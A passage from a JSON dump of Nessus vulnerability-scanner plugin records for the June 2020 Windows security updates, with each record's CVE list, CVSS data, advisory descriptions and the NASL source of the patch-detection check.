KB4561666.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561666',\n '4561673'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561666, 4561673])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:36", "description": "The remote Windows host is missing security update 4561674 or cumulative update 4561612. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561674: Windows Server 2012 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561612.NASL", "href": "https://www.tenable.com/plugins/nessus/137257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137257);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561612\");\n script_xref(name:\"MSKB\", value:\"4561674\");\n script_xref(name:\"MSFT\", value:\"MS20-4561612\");\n script_xref(name:\"MSFT\", value:\"MS20-4561674\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561674: Windows Server 2012 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561674\nor cumulative update 4561612. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561612/windows-server-2012-update-kb4561612\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c1557bf\");\n # https://support.microsoft.com/en-us/help/4561674/windows-server-2012-update-kb4561674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?003ee4f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561674 or Cumulative Update KB4561612.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561612',\n '4561674'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561612, 4561674])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:20", "description": "The remote Windows host is missing security update 4561645 or cumulative update 4561670. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a 